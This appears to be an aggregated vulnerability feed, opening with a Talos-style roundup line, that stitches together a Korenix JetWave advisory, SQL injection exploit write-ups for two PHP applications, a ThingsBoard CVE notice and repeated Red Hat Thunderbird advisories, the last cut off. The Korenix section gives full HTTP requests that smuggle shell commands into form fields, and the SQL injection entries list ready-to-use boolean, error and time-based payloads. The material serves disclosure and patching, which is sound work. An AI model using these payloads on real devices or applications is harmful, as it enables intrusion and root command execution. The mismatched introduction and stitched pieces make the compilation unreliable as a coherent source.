Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 17 and Feb. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed...

Threat Round up for February 17 to February 24

Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

CVE-2023-23296: [EN] Multiple Vulnerabilities in Korenix JetWave Series - CyberDanube

Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: [CVE-2023-0982]# Tested on: Windows 11# PayloadGET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0981 )# Tested on: Windows 11```POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 6Origin: http://localhostConnection: closeReferer: http://localhost/php-ycrs/admin/?page=classesCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=96'```# PayloadParameter: id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery -comment)    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE(SELECT 8487 UNION SELECT 3172) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: id=96' AND (SELECT 4409 FROM(SELECTCOUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0982 )# Tested on: Windows 11##PayloadPOST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322Content-Length: 286Origin: http://localhostConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="id"2'-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="status"1-----------------------------408548517113152447833471217322--##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Yoga Class Registration System 1.0 SQL Injection

ThingsBoard 3.4.1 could allow a remote attacker to gain elevated privileges because hard-coded service credentials (usable for privilege escalation) are stored in an insecure format. (To read this stored data, the attacker needs access to the application server or its source code.)

CVE-2023-26462: ThingsBoard Release Notes

Sales Tracker System version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Authenticated SQL Injection on Sales Tracker System# Google Dork: NA# Date: 21/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Link: [download link if available]# Version: 1.0# Tested on: Windows 11```GET /php-sts/admin/products/view_product.php?id=5' HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://localhost/php-sts/admin/?page=productsCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin```# PayloadParameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=5' AND 3888=3888-- vxtB    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=5' OR (SELECT 7013 FROM(SELECTCOUNT(*),CONCAT(0x7162767671,(SELECT(ELT(7013=7013,1))),0x7170717671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ikkJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=5' AND (SELECT 2482 FROM (SELECT(SLEEP(5)))dHEy)-- ehsZ---[15:47:48] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Sales Tracker System 1.0 SQL Injection

Red Hat Security Advisory 2023-0817-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0817-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0817  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

ppc64le:  
thunderbird-102.8.0-2.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O78NzjgjWX9erEAQgLIQ/6AonOdpr7h94n5PRY3uGt6HwXlQIFKfHx  
BVL9Z/hzFW2Rir6GIDpSCXrKxCKSvTe9TCajYUv6a5PH5qEq0Ur3vRzawXDKm6I+  
Vk1DJIF82svSe3SI9xk0oLScagYIrGor/eNKO+kDw4iD9gVtXCl9EZfHpLvSJ+Ul  
HtqDLoo9Ns0M8pYiIFKxGPW1q+3yudeR1Yv2ZwBlDAkDDFJZgOyoNNO0JXNX4wg2  
yWFyTkogdwkhruFZZP52w2inqRnzeH4/OCqPrZE3Wf1IWtxgtgA/NJKVnTI+anKl  
m2Ly/tvgpOMXSMfGyVL2Vs4kegPi78t9LEXAG5TDUa0tk+7qqZmvifq78oXWgbPW  
yBtJyydTKcd4IQO/t9WlUmHKx4WnIzvrFqDnnYfv4lcTR5vxPUUrvw+LuWv7KSNG  
gOvw7tRfmVMR0TpxF9zzUeKO5F1syyT2Ao2YopWqUYNoT62mQkWTxVi91fybqcmk  
uZByqwwAlWkXgPAiSSm24m92AncwBTWnSqLOx4sk+sKthkhVnpnxcsJIQXxxoZXZ  
x2qmAA+SyAorZofZga3RGWXw0fqqWYX7YB33xc47uUGTkYRIlqBvp83wsd3YxgMG  
X8/EE5po5UWM2ZzZ62HVqUc0Y4bk+Ko/kLFDqVPxUjMYVU7inGjMhEwlyEdnd8yj  
C3OvNTrjD7Y=TSFg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0817-01

Red Hat Security Advisory 2023-0824-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0824-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0824  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.8.0-2.el9_1.src.rpm

aarch64:  
thunderbird-102.8.0-2.el9_1.aarch64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.aarch64.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.aarch64.rpm

ppc64le:  
thunderbird-102.8.0-2.el9_1.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.ppc64le.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.ppc64le.rpm

s390x:  
thunderbird-102.8.0-2.el9_1.s390x.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.s390x.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.s390x.rpm

x86_64:  
thunderbird-102.8.0-2.el9_1.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.x86_64.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O7/dzjgjWX9erEAQiXiA/+MoFSpvKXYrTWHqymS4HzuRuEyLw47Y7W  
yX/rs4C+wJ+0nwEhOK8Ds62OUAC0xP6v9p7Uub7xByXrRRyBnrfH+KgXjnzd7tec  
XTKIv2etk6hC7cb6HNNNqmG9sia7tQGnJJPjMYypzS52U2Bllf8Oq9X4lnMZFQls  
Th7nv0P7zuNnVq9bu2r2ndNQK1hT2ai0pLlf84Xnipk1eClfUXd6GZ5MIbwZCKqD  
S5VhAlGOIuPn4W/fT3UH2TVJchQ8ode84STyweUouLmhzMM5AcJN7XxAH0cmQIYi  
ZRnv8x3gshdmlzM95vBGQqwuTGC/DW1udbo5NgFQiIL1cjBxRduKmsp3MTFSXZLB  
tv0hLqjQMDC3Ldd1TmIfpxi3nayr8hCgpn06B6F1GUB8/vG+ocMkcO8uOxtNkty8  
27fqpuA29RJnWmUnSzfnepg7X0AOf/b+3MOcHI5336E0TBr+un9vluAbV9X/k5N6  
WBd7BppnnqcP0C4EmljCkKqLGPCbDQ7lWuLFdy6d8ye4aPJGstOgLkYc/vJak4e8  
rxfUFwCXRtAaSEzgjm7SjuII7Y+eEMkN7GARRdztc9Ta1Tl2VkXtgc0yjTaGCRg+  
nhr3EaTWMMw+dSTDbYjL9WqaOosv78CeT4Zu6EN/9elljlk0VU2hLJPchHkKEcnG  
c2zHHoFZY3k=gNig  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0824-01

Red Hat Security Advisory 2023-0821-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0821-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0821  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

